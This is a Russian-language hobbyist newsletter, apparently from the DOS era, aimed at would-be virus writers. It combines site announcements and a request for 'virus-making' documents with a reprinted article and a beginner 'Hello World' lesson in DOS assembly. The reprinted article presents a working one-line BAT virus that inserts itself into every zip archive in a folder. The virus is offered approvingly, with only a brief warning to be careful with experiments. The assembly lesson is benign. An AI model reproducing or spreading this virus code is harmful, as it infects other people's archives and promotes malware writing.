От Maverick: Вот тепрь, можно сказать, что наш сайт скоро будет готов, впринципе оформление уже есть, и надо сказать обалденное, опять же спасибо Dimon'у, так что можете зайти посмотреть. Плиз оставте в гостевой книге ваши отзывы, интересно просто в каком направлении нам дальше работать. Все отзывы учтутся и обсудятся. На днях будет готов и чат, где мы сможем пообщаться.
От Maverick:
На сайте есть фотозал, так что если хотите, то можете слать свои фотки, разместим. Моей, правда, пока нет, но скоро закину. И еще, если есть доки по асму или вирмейкингу, то мыльте мне. Давайте заполним наш сайт полезной информацией. Я и так с утра до вечера из поисковиков не вылазию, чтоб облегчить нам жизнь.
Есть кcтати предложение, в рассылке изучать DELPHI, я и сам не против, но я его не знаю. Если найдем человека, то будем. Потом может страничку на сайте про DELPHI сделаем, но это как масть пойдет.
Автор неизвестен, но в конце статьи я нашел его адрес: metra555777@chat.ru так что думаю я не нарушил авторских прав. (Часть вторая)
"Вот вирус, который заражает *.zip (архивы).
Вот глядите:
@For %%g in (*.zip) do pkzip %%g %0 >nul
Что это за лажа? (у вас не возникло этого вопроса?) Это не "лажа", это полноценный вирус в виде BAT-файла. Состоит он из одной строчки. Хотя он вряд ли сможет вызвать мировую эпидемию, но авторы антивирусов с удовольствием пополнят им свои базы ==> свои карманы."
От Maverick:
Еще раз напоминаю, будте осторожны со своими эксперементами, а иначе....да поможет вам бог!
От Maverik:
Ну чтож, давайте напишем нашу первую программку, небезизвестную "Hello World!".
В каждой строке, после команд и операторов будет стоять точка с запятой и комментарий к этой строке. Так всегда делают чтобы было понятнее читать программу. При ассемблировании, т.е. при переводе программы в машинные коды ассемблер эти строки пропустит. Номера строк писать не следует, они не нужны, я их поставил чтобы было проще объяснять.Пустые строки для наглядности, а там где нет комментариев, рассмотрим позже. Поехали....
(10) SEGM segment
(20) org 100h
(30)
(40) Start: ;Название нашего кода
(50)
(60) mov ah,9h ;загрузим в регистр ah число 9h, это номер функции DOS
(70) mov dx,offset Message ;загрузим в dx......узнаем позже
(80) int 21h ;вызовем 21-е прерывание DOS
(90)
(100) int 20h ;аналогично, но уже 20-е
(110)
(120)Message db 'Hello, world!$' ;наша строчка, заметьте символ $
(130)
(140)SEGM ends
(150)end Start ;Конец нашего кода
Что же такое прерывание?
Прерывание-это свого рода подпрграмма, входящая в DOS. Она значительно упрощает процесс программирования на ассемблере. Существует множество прерываний.
Рассмотрим наши. Прерывание под номером 20h, позволяет нам закончить программу, т.е. оно говорит компьютеру Game Over :), и компьютер выходит из программы.
А вот прерывание 21h позволяет нам вывести строку. Перед тем, как его вызвать нужно в регистр ah занести номер функции 9h. В dx надо занести адрес строки, а иначе, как ассемблер узнает, что мы хотим вывести. Вообще-то у прерывания 21h много функций, но именно 9-ая позволяет вывести строку. Так что правильнее будет сказать, не 21 прерывание выводит строку, а функция 9h прерывания 21h.
Теперь обратите внимание на строку (120), там содержится символ $, зачем он нужен? Процессор не знает сколько символов мы хотим вывести, и будет выводить подряд все символы, пока не встретит это значок.